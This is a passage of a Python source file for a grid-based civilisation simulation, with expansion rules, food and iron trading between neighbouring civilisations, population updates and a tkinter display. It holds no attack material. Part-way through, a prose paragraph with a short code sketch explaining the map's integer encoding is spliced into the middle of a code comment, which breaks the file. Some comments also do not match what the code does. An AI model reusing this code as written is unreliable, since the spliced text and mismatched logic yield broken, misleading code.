warrior : 3 fields conquered.\n if the civ is expert : 1 fields conquered.\n if the civ is moderate : 2 fields conquered\n then, depending on the square conquered, civ will have to wait some turns to be able to reconquer a new square:\n if mountain : 50turns\n if desert : 30 turns\n if anything else : 10 turns\n Returns the new map after on turn.\n \"\"\"\n global dic_civ\n new_m = m\n next_turn = 1 # depends on expansion rate, allowing multiple moves\n skip = True # same\n\n dic_civ[civ[\"civ_number\"]][\"food\"] += dic_civ[civ[\"civ_number\"]][\"food_per_turn\"] # adds field food to civ food_per_turn\n dic_civ[civ[\"civ_number\"]][\"iron\"] += dic_civ[civ[\"civ_number\"]][\"iron_per_turn\"] # adds field iron to civ iron_per_turn\n\n if dic_civ[civ[\"civ_number\"]][\"next_expand\"] > 0: # this comparison is to check that the civ is allowed to move again.\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] -= 1\n #for i in range(len(new_m)):\n #for j in range(len(new_m[i])):\n #trading_interaction(civ,new_m,i,j)\n else: # here we allow the civ to expand\n while next_turn > 0:\n new_pos_x = \"fix\" # to fix a bug(civ2 having no place to move then no value for new_pos)\n new_pos_y = \"fix\" # same\n k = 0 # index for first new place for comparison purpose\n for i in range(len(new_m)): # going through all the map\n for j in range(len(new_m[i])):\n x, y = check_surroundings(new_m, i, j) # getting m[i][j] best surroundings pos.\n if new_m[i][j] >= civ[\"civ_number\"] * 10 and new_m[i][j] <= 9 + civ[\"civ_number\"] * 10: # checks if the square is occupied by civ, and that the best surroundings aren't occupied.\n if (not dic_civ[civ[\"civ_number\"]][\"already_gave\"]) and (not dic_civ[civ[\"civ_number\"]][\"already_earned\"]):\n trading_interaction(civ,new_m,i,j)\n if new_m[x][y] < 10:\n if k == 0: # gives initial value\n new_pos_x = x # sets new pos to affect, initial one\n new_pos_y = y\n k += 1\n elif new_m[new_pos_x][new_pos_y] > new_m[x][y]: # comparison for best place\n new_pos_x = x # sets new pos to affect, not initial one\n new_pos_y = y\n next_turn -= 1 # removes a step from 
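The map encoding used throughout this CIV record packs owner and terrain into one integer: a cell holds civ_number * 10 + terrain, so the terrain type is cell % 10 and the owner is the remaining digits (0 when the field is free), which is exactly what spread_population and spawn_civ rely on. A tiny sketch of the round trip:

import math

terrain = 3                         # a mine, per the legend dict in this record
civ_number = 2
cell = civ_number * 10 + terrain    # what spawn_civ / dynamics_civ write into m[x][y]

assert cell % 10 == terrain                  # recover the field type
assert math.floor(cell / 10) == civ_number   # recover the owning civilisation (0 = free)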
expanding\n if civ[\"expansion rate\"] == 2 and skip: # this if allows one more step for moderate civ\n next_turn += 1\n skip = False\n elif civ[\"expansion rate\"] == 3 and skip: # this if allows 2 more steps for warrior civ, expert civ won't get extra move.\n next_turn += 2\n skip = False\n if new_pos_x != \"fix\" and new_pos_y != \"fix\": # to fix the bug above\n if new_m[new_pos_x][new_pos_y] == 5:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 50\n elif new_m[new_pos_x][new_pos_y] == 6:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 30\n elif new_m[new_pos_x][new_pos_y] == 1 or new_m[new_pos_x][new_pos_y] == 2 or new_m[new_pos_x][\n new_pos_y] == 3 or new_m[new_pos_x][new_pos_y] == 4:\n dic_civ[civ[\"civ_number\"]][\"next_expand\"] = 10\n\n dic_civ[civ[\"civ_number\"]][\"population\"] += dic_population[new_m[new_pos_x][new_pos_y]] # updates population\n food, iron = dic_ressources[new_m[new_pos_x][new_pos_y]] # gets field food and iron\n dic_civ[civ[\"civ_number\"]][\"food_per_turn\"] += food*dic_civ[civ[\"civ_number\"]][\"productivity\"] # adds field food to civ food_per_turn\n dic_civ[civ[\"civ_number\"]][\"iron_per_turn\"] += iron*dic_civ[civ[\"civ_number\"]][\"productivity\"] # adds field iron to civ iron_per_turn\n dic_civ[civ[\"civ_number\"]][\"territories\"] += 1\n new_m[new_pos_x][new_pos_y] += civ[\"civ_number\"] * 10 # gives new value\n\n\n dic_civ[civ[\"civ_number\"]][\"food\"] -= dic_civ[civ[\"civ_number\"]][\"population\"]/2000\n #update_population(civ)\n # print(new_m) # for tests\n # print(\"\\n\") # for tests\n return new_m\n\n\ndef delete_civ(m,civ):\n civ_number = civ[\"civ_number\"]\n for i in range(len(m)):\n for j in range(len(m[i])):\n if math.floor(m[i][j]/10) == civ_number:\n m[i][j] = m[i][j]%10\n dic_civ.pop(civ_number,None)\n\n\ndef update_trading():\n for k in dic_civ:\n dic_civ[k][\"already_gave\"] = 0\n dic_civ[k][\"already_earned\"] = 0\n\ndef update_population(civ):\n '''golden = (1 + 5 ** 0.5) / 2\n current_pop = dic_civ[civ[\"civ_number\"]][\"population\"]\n new_pop = dic_civ[civ[\"civ_number\"]][\"food\"] * 2000\n deaths = (current_pop/10) -(golden**(-iteration))*new_pop\n if new_pop <= 0:\n new_born = 0.2*deaths\n else:\n new_born = 2*deaths\n if dic_civ[civ[\"civ_number\"]][\"type\"] == \"warrior\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"expert\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"moderate\":\n dic_civ[civ[\"civ_number\"]][\"population\"] = current_pop - deaths + new_born\n '''\n if dic_civ[civ[\"civ_number\"]][\"type\"] == \"warrior\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"expert\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n elif dic_civ[civ[\"civ_number\"]][\"type\"] == \"moderate\":\n dic_civ[civ[\"civ_number\"]][\"population\"] += (dic_civ[civ[\"civ_number\"]][\"food\"] * 2000)/10\n\n\n\ndef trading_interaction(civ,m,i,j,trading_rate=1):\n civ_number = civ[\"civ_number\"]\n trade_amount = (dic_civ[civ_number][\"food_per_turn\"] - dic_civ[civ_number][\"population\"] / 2000)\n if trade_amount>=0:\n if m[i][j]>= civ_number*10 and m[i][j] < civ_number*20:\n if i + 1 < len(m) and math.floor(m[i+1][j] / 10)!=civ_number and math.floor(m[i+1][j] / 10)>= 1:\n if 
dic_civ[civ_number][\"food\"]>10*trade_amount:\n                necessary = 2*dic_civ[math.floor(m[i+1][j] / 10)][\"population\"]/2000\n                if dic_civ[math.floor(m[i+1][j] / 10)][\"food\"] < necessary:\n                    if dic_civ[math.floor(m[i+1][j] / 10)][\"iron\"] > trade_amount/trading_rate:\n                        dic_civ[math.floor(m[i+1][j] / 10)][\"iron\"] -= trade_amount/trading_rate\n                        dic_civ[math.floor(m[i+1][j] / 10)][\"food\"] += trade_amount\n                        dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n                        dic_civ[civ_number][\"food\"] -= trade_amount\n                        dic_civ[civ_number][\"already_gave\"] = 1\n                        print(\"Civ \"+str(civ_number)+\" traded \"+str(round(trade_amount,2))+\" food with Civ \"+str(math.floor(m[i+1][j] / 10)))\n            elif j - 1 < len(m) and math.floor(m[i][j - 1] / 10)!=civ_number and math.floor(m[i][j - 1] / 10)>= 1:\n                if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n                    necessary = 2*dic_civ[math.floor(m[i][j - 1] / 10)][\"population\"]/2000\n                    if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] < necessary:\n                        if dic_civ[math.floor(m[i][j - 1] / 10)][\"iron\"] > trade_amount/trading_rate:\n                            dic_civ[math.floor(m[i][j - 1] / 10)][\"iron\"] -= trade_amount/trading_rate\n                            dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n                            dic_civ[civ_number][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"already_gave\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \" food with Civ \" + str(\n                                math.floor(m[i][j-1] / 10)))\n\n            elif i - 1 < len(m) and math.floor(m[i-1][j] / 10)!=civ_number and math.floor(m[i-1][j] / 10)>= 1:\n                if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n                    necessary = 2*dic_civ[math.floor(m[i-1][j] / 10)][\"population\"]/2000\n                    if dic_civ[math.floor(m[i-1][j]/ 10)][\"food\"] < necessary:\n                        if dic_civ[math.floor(m[i-1][j] / 10)][\"iron\"] > trade_amount/trading_rate:\n                            dic_civ[math.floor(m[i-1][j] / 10)][\"iron\"] -= trade_amount/trading_rate\n                            dic_civ[math.floor(m[i-1][j] / 10)][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n                            dic_civ[civ_number][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"already_gave\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \" food with Civ \" + str(\n                                math.floor(m[i - 1][j] / 10)))\n\n            elif j + 1 < len(m) and math.floor(m[i][j+1] / 10)!=civ_number and math.floor(m[i][j+1] / 10)>= 1:\n                if dic_civ[civ_number][\"food\"] > 10*trade_amount:\n                    necessary = 2*dic_civ[math.floor(m[i][j+1] / 10)][\"population\"]/2000\n                    if dic_civ[math.floor(m[i][j+1]/ 10)][\"food\"] < necessary:\n                        if dic_civ[math.floor(m[i][j+1] / 10)][\"iron\"] > trade_amount/trading_rate:\n                            dic_civ[math.floor(m[i][j+1] / 10)][\"iron\"] -= trade_amount/trading_rate\n                            dic_civ[math.floor(m[i][j+1] / 10)][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"iron\"] += trade_amount/trading_rate\n                            dic_civ[civ_number][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"already_gave\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" traded \" + str(round(trade_amount,2)) + \" food with Civ \" + str(\n                                math.floor(m[i][j+1] / 10)))\n    elif not dic_civ[civ_number][\"already_earned\"]:\n        trade_amount *= -1\n        if m[i][j] >= civ_number * 10 and m[i][j] < civ_number * 20:\n            if i + 1 < len(m) and math.floor(m[i + 1][j] / 10) != civ_number and math.floor(m[i + 1][j] / 10) >= 1:\n                if dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] > 10 * trade_amount:\n                    necessary = 2 * dic_civ[math.floor(m[i + 1][j] / 10)][\"population\"] / 2000\n                    if dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] < necessary:\n                        if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n                            dic_civ[math.floor(m[i + 1][j] / 10)][\"iron\"] += trade_amount / trading_rate\n                            dic_civ[math.floor(m[i + 1][j] / 10)][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"iron\"] -= 
trade_amount / trading_rate\n                            dic_civ[civ_number][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"already_earned\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \" food from Civ \" + str(math.floor(m[i+1][j] / 10)))\n\n            elif j - 1 < len(m) and math.floor(m[i][j - 1] / 10) != civ_number and math.floor(m[i][j - 1] / 10) >= 1:\n                if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] > 10 * trade_amount:\n                    necessary = 2 * dic_civ[math.floor(m[i][j - 1] / 10)][\"population\"] / 2000\n                    if dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] < necessary:\n                        if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n                            dic_civ[math.floor(m[i][j - 1] / 10)][\"iron\"] += trade_amount / trading_rate\n                            dic_civ[math.floor(m[i][j - 1] / 10)][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n                            dic_civ[civ_number][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"already_earned\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \" food from Civ \" + str(\n                                math.floor(m[i][j-1] / 10)))\n\n            elif i - 1 < len(m) and math.floor(m[i - 1][j] / 10) != civ_number and math.floor(m[i - 1][j] / 10) >= 1:\n                if dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] > 10 * trade_amount:\n                    necessary = 2 * dic_civ[math.floor(m[i - 1][j] / 10)][\"population\"] / 2000\n                    if dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] < necessary:\n                        if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n                            dic_civ[math.floor(m[i - 1][j] / 10)][\"iron\"] += trade_amount / trading_rate\n                            dic_civ[math.floor(m[i - 1][j] / 10)][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n                            dic_civ[civ_number][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"already_earned\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \" food from Civ \" + str(\n                                math.floor(m[i-1][j] / 10)))\n\n            elif j + 1 < len(m) and math.floor(m[i][j + 1] / 10) != civ_number and math.floor(m[i][j + 1] / 10) >= 1:\n                if dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] > 10 * trade_amount:\n                    necessary = 2 * dic_civ[math.floor(m[i][j + 1] / 10)][\"population\"] / 2000\n                    if dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] < necessary:\n                        if dic_civ[civ_number][\"iron\"] > trade_amount / trading_rate:\n                            dic_civ[math.floor(m[i][j + 1] / 10)][\"iron\"] += trade_amount / trading_rate\n                            dic_civ[math.floor(m[i][j + 1] / 10)][\"food\"] -= trade_amount\n                            dic_civ[civ_number][\"iron\"] -= trade_amount / trading_rate\n                            dic_civ[civ_number][\"food\"] += trade_amount\n                            dic_civ[civ_number][\"already_earned\"] = 1\n                            print(\"Civ \" + str(civ_number) + \" earned \" + str(round(trade_amount,2)) + \" food from Civ \" + str(\n                                math.floor(m[i][j + 1] / 10)))\n\n\ndef safe_reaction(k,m):\n    global dic_civ\n    if dic_civ[k][\"reaction\"] == 2:\n        dic_civ[k][\"reaction\"] = 0\n        dic_civ[k][\"food\"] += dic_civ[k][\"food_per_turn\"] # adds per-turn food income to civ food\n        dic_civ[k][\"iron\"] += dic_civ[k][\"iron_per_turn\"] # adds per-turn iron income to civ iron\n        return m\n    else:\n        dic_civ[k][\"reaction\"] += 1\n        return dynamics_civ(dic_civ[k],m) # the caller expects the updated map back\n\n\ndef check_surroundings(m, x, y):\n    '''\n    checks best surroundings in + shape with m[x][y] at middle. 
Allows spherical map (moving right past the right edge wraps back to the left, and likewise vertically).\n    '''\n    # scan the four +-shaped neighbours for the cheapest free field type: 1 first, then 2, and so on up to 6.\n    for field in range(1, 7):\n        if x + 1 < len(m) and m[x + 1][y] == field:\n            return x + 1, y\n        elif y - 1 < len(m) and m[x][y - 1] == field:\n            return x, y - 1\n        elif x - 1 < len(m) and m[x - 1][y] == field:\n            return x - 1, y\n        elif y + 1 < len(m) and m[x][y + 1] == field:\n            return x, y + 1\n    return x, y\n\n\ndef check_surroundings2(m, x, y):\n    '''\n    Returns the coordinates of the best surrounding field for a given (civilization) tile and map.\n    '''\n    x1 = x\n    y1 = y\n    # the best pos is initially set to the current pos of the civilisation, so that if it is surrounded by other civilisations it won't move\n    best_pos = m[x][y]\n    # the first test makes sure we won't get an index out of the range of the matrix,\n    # the second avoids having a civilisation take over the field of another,\n    # the third compares the fields to choose the best one.\n    if x + 1 < len(m) and m[x + 1][y] < 10 and m[x + 1][y] < best_pos:\n        best_pos = m[x + 1][y]\n        x1 = x + 1\n        y1 = y\n    if y + 1 < len(m) and m[x][y + 1] < 10 and m[x][y + 1] < best_pos:\n        best_pos = m[x][y + 1]\n        x1 = x\n        y1 = y + 1\n    if m[x][y - 1] < 10 and m[x][y - 1] < best_pos:\n        best_pos = m[x][y - 1]\n        x1 = x\n        y1 = y - 1\n    if m[x - 1][y] < 10 and m[x - 1][y] < best_pos:\n        best_pos = m[x - 1][y]\n        x1 = x - 1\n        y1 = y\n\n    return x1, y1\n\n\ndef dynamics_civ2(m, iterations):\n    '''expands the civilizations on the map. A warrior civ expands by one field every turn, a moderate one by one field every two turns, and\n    an expert one by one field every three turns. 
Deserts and mountains slow down the expansion of a civ by one turn.\n    Returns the map after a given number of iterations or once the whole map is filled.\n    '''\n    new_m = m\n    turn = 1\n    not_slowed_down = True\n    # (new_m >= 10).all() checks whether the whole map has been conquered (every field already carries a civ digit).\n    while not ((new_m >= 10).all()) and turn < iterations:\n        already_expanded = set()\n        for i in range(len(new_m)):  # going through the whole map\n            for j in range(len(new_m[i])):\n                civ_num = math.floor(m[i][j] / 10)  # extracts the tens digit, which corresponds to the civ number (0 if there's no civ on the field)\n                # the first condition below makes sure we run the rest of the instructions only if the field (i,j) is a civ controlled field.\n                # the second makes sure that, while running through the matrix, we won't give a \"free\" move to the same civilisation twice\n                # the last assigns a different expansion speed to each civilisation based on the \"modulo\"\n                if civ_num > 0:\n                    # each turn the civ harvests the fields that it possesses:\n                    food, iron = dic_ressources[m[i][j] - civ_num * 10]\n                    dic_civ[civ_num][\"food\"] += food\n                    dic_civ[civ_num][\"iron\"] += iron\n                    if civ_num not in already_expanded and turn % dic_civ[civ_num][\"modulo\"] == 0:\n                        x, y = check_surroundings2(new_m, i, j)  # choose the best adjacent field to expand to\n                        if m[x][y] == 5 or m[x][y] == 6:  # if the next field is a mountain or a desert\n                            not_slowed_down = not (not_slowed_down)  # becomes False for one turn\n                        # the following condition makes sure that if the civ cannot move further it won't change the civ_number of the field it already possesses\n                        if (x != i or y != j) and not_slowed_down:\n                            m[x][y] = m[x][y] + math.floor(m[i][j] / 10) * 10\n                            already_expanded.add(civ_num)\n                            spread_population(new_m, x, y)\n        for k in dic_civ:\n            dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n        turn += 1\n        #print(new_m)\n        #print(\"\\n\")\n    return new_m\n\n\ndef dynamics_civ2_incoming(m, iterations):\n    '''expands the civilizations on the map. A warrior civ expands by one field every turn, a moderate one by one field every two turns, and\n    an expert one by one field every three turns. 
Deserts and mountains slow down the expansion of a civ by one turn.\n    Returns the map after a given number of iterations or once the whole map is filled.\n    '''\n    new_m = m\n    turn = 1\n    not_slowed_down = True\n    #list_x = []\n    #list_food = []\n    #list_food2 = []\n    #list_popu=[]\n    while turn < iterations:\n        already_expanded = set()\n        new_field = set()\n        for k in dic_civ:\n            dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n            update_population(dic_civ[k])\n        for i in range(len(new_m)):  # going through the whole map\n            for j in range(len(new_m[i])):\n                civ_num = math.floor(new_m[i][j] / 10)\n                if civ_num > 0:\n                    if (i, j) not in new_field:\n                        #print((i,j))\n                        food, iron = dic_ressources[new_m[i][j] - civ_num * 10]\n                        dic_civ[civ_num][\"food\"] += food * dic_civ[civ_num][\"productivity\"]\n                        dic_civ[civ_num][\"iron\"] += iron * dic_civ[civ_num][\"productivity\"]\n                    if civ_num not in already_expanded and turn % dic_civ[civ_num][\"modulo\"] == 0:\n                        x, y = check_surroundings2(new_m, i, j)\n                        if new_m[x][y] == 5 or new_m[x][y] == 6:\n                            not_slowed_down = not (not_slowed_down)\n                        if (x != i or y != j) and not_slowed_down:\n                            new_m[x][y] = new_m[x][y] + civ_num * 10\n                            already_expanded.add(civ_num)\n                            spread_population(new_m, x, y)\n                            new_field.add((x%len(new_m), y%len(new_m)))\n\n        # the commented-out lines below (together with the lists initialised before the loop) are used to plot debugging curves\n        #list_x.append(turn)\n        #list_food.append(dic_civ[2][\"food\"])\n        #list_popu.append(dic_civ[2][\"food\"]-dic_civ[2][\"population\"]/2000)\n        # list_food2.append(dic_civ[2][\"food\"] * 2000 - dic_civ[2][\"population\"])\n    #plt.plot(list_x, list_food, 'r')\n    #plt.plot(list_x, list_popu,'g')\n    # plt.plot(list_x, list_food2, 'g')\n    #plt.ylabel('r: initial food, g: final food')\n    #plt.xlabel(\"turn\")\n        turn += 1\n        #print(\"\\n\")\n\n    #print(new_m)\n    #print(\"\\n\")\n    return new_m\n\ndef iterate(m):\n    global gnot_slowed_down\n    gnot_slowed_down = not gnot_slowed_down\n    global gnew_m\n    gnew_m = m\n    global gturn\n    already_expanded = set()\n    new_field = set()\n    for k in dic_civ:\n        dic_civ[k][\"food\"] -= dic_civ[k][\"population\"] / 2000\n        update_population(dic_civ[k])\n    for i in range(len(gnew_m)):  # going through the whole map\n        for j in range(len(gnew_m[i])):\n            civ_num = math.floor(gnew_m[i][j] / 10)\n            if civ_num > 0:\n                if (i, j) not in new_field:\n                    # print((i,j))\n                    food, iron = dic_ressources[gnew_m[i][j] - civ_num * 10]\n                    dic_civ[civ_num][\"food\"] += food * dic_civ[civ_num][\"productivity\"]\n                    dic_civ[civ_num][\"iron\"] += iron * dic_civ[civ_num][\"productivity\"]\n                if (civ_num not in already_expanded) and (gturn % dic_civ[civ_num][\"modulo\"]) == 0:\n                    x, y = check_surroundings2(gnew_m, i, j)\n                    if gnew_m[x][y] == 5 or gnew_m[x][y] == 6:\n                        gnot_slowed_down = not (gnot_slowed_down)\n                    if (x != i or y != j) and gnot_slowed_down:\n                        gnew_m[x][y] = gnew_m[x][y] + civ_num * 10\n                        already_expanded.add(civ_num)\n                        spread_population(gnew_m, x, y)\n                        new_field.add((x % len(gnew_m), y % len(gnew_m)))\n    gturn += 1\n    return gnew_m\n\n\ndef civ_color(civ_number):\n    new_number = int(civ_number)\n    if new_number == 1:\n        return \"red\"\n    elif new_number == 2:\n        return \"blue\"\n    elif new_number == 3:\n        return \"black\"\n    elif new_number == 4:\n        return \"light yellow\"\n    elif new_number == 5:\n        return \"dark khaki\"\n    elif new_number == 6:\n        return \"dark slate blue\"\n\n# tests for image\nclass Show:\n\n    def __init__(self):\n        self.root = Tk()\n\n        self.root.lift()\n        self.root.attributes('-topmost', True)\n        self.root.after_idle(self.root.attributes, '-topmost', False)\n        self.root.geometry(\"+0+0\")\n\n        
self.turn = 0\n self.dyn_type = 3\n\n image1 = Image.open(\"image1.gif\")\n image1 = image1.resize((20, 20), Image.ANTIALIAS)\n self.image1 = ImageTk.PhotoImage(image1)\n image2 = Image.open(\"image2.gif\")\n image2 = image2.resize((20, 20), Image.ANTIALIAS)\n self.image2 = ImageTk.PhotoImage(image2)\n image3 = Image.open(\"image3.gif\")\n image3 = image3.resize((20, 20), Image.ANTIALIAS)\n self.image3 = ImageTk.PhotoImage(image3)\n image4 = Image.open(\"image4.gif\")\n image4 = image4.resize((20, 20), Image.ANTIALIAS)\n self.image4 = ImageTk.PhotoImage(image4)\n image5 = Image.open(\"image5.gif\")\n image5 = image5.resize((20, 20), Image.ANTIALIAS)\n self.image5 = ImageTk.PhotoImage(image5)\n image6 = Image.open(\"image6.gif\")\n image6 = image6.resize((20, 20), Image.ANTIALIAS)\n self.image6 = ImageTk.PhotoImage(image6)\n # same with borders possible\n bor_image1 = Image.open(\"image1.gif\")\n bor_image1 = bor_image1.resize((16, 16), Image.ANTIALIAS)\n self.bor_image1 = ImageTk.PhotoImage(bor_image1)\n bor_image2 = Image.open(\"image2.gif\")\n bor_image2 = bor_image2.resize((16, 16), Image.ANTIALIAS)\n self.bor_image2 = ImageTk.PhotoImage(bor_image2)\n bor_image3 = Image.open(\"image3.gif\")\n bor_image3 = bor_image3.resize((16, 16), Image.ANTIALIAS)\n self.bor_image3 = ImageTk.PhotoImage(bor_image3)\n bor_image4 = Image.open(\"image4.gif\")\n bor_image4 = bor_image4.resize((16, 16), Image.ANTIALIAS)\n self.bor_image4 = ImageTk.PhotoImage(bor_image4)\n bor_image5 = Image.open(\"image5.gif\")\n bor_image5 = bor_image5.resize((16, 16), Image.ANTIALIAS)\n self.bor_image5 = ImageTk.PhotoImage(bor_image5)\n bor_image6 = Image.open(\"image6.gif\")\n bor_image6 = bor_image6.resize((16, 16), Image.ANTIALIAS)\n self.bor_image6 = ImageTk.PhotoImage(bor_image6)\n # capitals special\n image1_c = Image.open(\"image1_c.gif\")\n image1_c = image1_c.resize((16, 16), Image.ANTIALIAS)\n self.image1_c = ImageTk.PhotoImage(image1_c)\n image2_c = Image.open(\"image2_c.gif\")\n image2_c = image2_c.resize((16, 16), Image.ANTIALIAS)\n self.image2_c = ImageTk.PhotoImage(image2_c)\n image3_c = Image.open(\"image3_c.gif\")\n image3_c = image3_c.resize((16, 16), Image.ANTIALIAS)\n self.image3_c = ImageTk.PhotoImage(image3_c)\n image4_c = Image.open(\"image4_c.gif\")\n image4_c = image4_c.resize((16, 16), Image.ANTIALIAS)\n self.image4_c = ImageTk.PhotoImage(image4_c)\n image5_c = Image.open(\"image5_c.gif\")\n image5_c = image5_c.resize((16, 16), Image.ANTIALIAS)\n self.image5_c = ImageTk.PhotoImage(image5_c)\n image6_c = Image.open(\"image6_c.gif\")\n image6_c = image6_c.resize((16, 16), Image.ANTIALIAS)\n self.image6_c = ImageTk.PhotoImage(image6_c)\n\n self.start = Button(self.root,text=\"Iterate\",command=self.simulate)\n self.iterate10 = Button(self.root,text=\"10\",command=lambda:self.iter(10))\n self.iterate100 = Button(self.root, text=\"100\", command=lambda: self.iter(100))\n self.iterate1000 = Button(self.root, text=\"1000\", command=lambda: self.iter(1000))\n self.spawn = Button(self.root,text=\"Spawn new civ...\",command=self.spawn_new_civ)\n\n self.OptionsList = (\"Dynamic 1\", \"Dynamic 2\")\n self.optionmenu_v = StringVar()\n self.optionmenu_v.set(self.OptionsList[0])\n self.label2 = Label(self.root, text=\"Choose dynamic function :\")\n self.label2.grid(row=0, column=0, sticky=W)\n self.to = OptionMenu(self.root, self.optionmenu_v, *self.OptionsList)\n self.to.grid(row=0, column=1, sticky=W)\n self.submit = Button(self.root,text=\"Start\",command=self.spawn_start)\n 
self.submit.grid(row=3,column=0,sticky=W)\n\n self.pre_m = np.random.randint(0, 1, (45, 45))\n self.m = create_map_random()\n #print(self.m)\n #print(\"\\n\")\n\n self.m = homogeneize(self.m)\n #print(\"\\n\")\n # for tests\n\n create_civ(\"warrior\")\n self.m = spawn_civ(dic_civ[1], self.m, 0, 0)\n create_civ(\"expert\")\n self.m = spawn_civ(dic_civ[2], self.m, 15, 15)\n create_civ(\"moderate\")\n self.m = spawn_civ(dic_civ[3], self.m, 30, 30) # 3 civs\n #print(self.m)\n #print(\"\\n\")\n\n # dynamics_civ2_incoming(m,5000)\n\n self.turn_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.iron_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.population_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_paid_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.food_turn_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n self.territories_label = Label(self.root,text=\"\",justify=LEFT,anchor=W,width=60)\n\n # plt.show()\n self.sub = Frame(self.root)\n self.sub.grid(row=0, column=2,rowspan=10, sticky=NW)\n\n self.animation_var = IntVar()\n self.animate = Checkbutton(self.root,text=\"Animate\",variable=self.animation_var)\n self.animate.grid(row=1,column=0,sticky=NW)\n self.spawn.grid(row=2, column=0, sticky=NW)\n\n self.show_once(True)\n\n self.root.mainloop()\n\n def iter(self,iteration=1):\n for i in range(iteration):\n self.root.after((i + 1) * 50*self.higher_gap(self.turn), self.simulate)\n\n def spawn_start(self):\n place = 0\n self.label2.grid_forget()\n self.to.grid_forget()\n self.submit.grid_forget()\n self.animate.grid_forget()\n self.spawn.grid_forget()\n self.dyna = self.optionmenu_v.get()\n if self.dyna == \"Dynamic 2\":\n self.dyn_type = 2\n elif self.dyna == \"Dynamic 1\":\n self.dyn_type = 1\n if self.animation_var.get() == 0:\n place = 0\n elif self.animation_var.get() == 1:\n place = 4\n\n self.turn_label.grid(row=5-place,column=0, sticky=NW)\n self.food_label.grid(row=6-place,column=0, sticky=NW)\n '''self.iron_label.grid(row=7-place,column=0, sticky=NW)\n self.population_label.grid(row=8-place,column=0, sticky=NW)\n self. 
food_paid_label.grid(row=9-place,column=0, sticky=NW)\n self.food_turn_label.grid(row=10-place,column=0, sticky=NW)\n self.territories_label.grid(row=11-place,column=0, sticky=NW)'''\n self.update_labels()\n if self.animation_var.get() == 0:\n self.start.grid(row=0, column=0, sticky=NW)\n self.iterate10.grid(row=1,column=0,sticky=NW)\n self.iterate100.grid(row=2,column=0,sticky=NW)\n self.iterate1000.grid(row=3, column=0, sticky=NW)\n self.spawn.grid(row=4,column=0,sticky=NW)\n elif self.animation_var.get() == 1:\n #self.root.after(3000, self.simulate)\n for k in range(1500):\n self.root.after(3000+(k+1)*50*self.higher_gap(k),self.simulate)\n\n\n def update_labels(self):\n s=''\n for k in dic_civ:\n s += \"\\nCiv \" + str(k) + \": \" + str(\n dic_civ[k][\"type\"] + \"\\nFood: \" + str(round(dic_civ[k][\"food\"], 2))) + \"\\nIron: \" + str(\n round(dic_civ[k][\"iron\"], 2)) + \"\\nPopulation: \" + str(\n round(dic_civ[k][\"population\"], 2)) + \"\\nPaying food : \" + str(\n round(dic_civ[k][\"population\"] / 2000, 2)) + \"\\nFood per turn: \" + str(\n round(dic_civ[k][\"food_per_turn\"], 2)) + \"\\nTerritories: \" + str(\n round(dic_civ[k][\"territories\"], 2)) + \"\\n\\n\"\n self.turn_label.configure(text=\"turn : \"+str(self.turn))\n self.food_label.configure(text=s)\n '''self.food_label.configure(text=\"warriors food:\\t\"+str(round(dic_civ[1][\"food\"],2))+\"\\nexperts 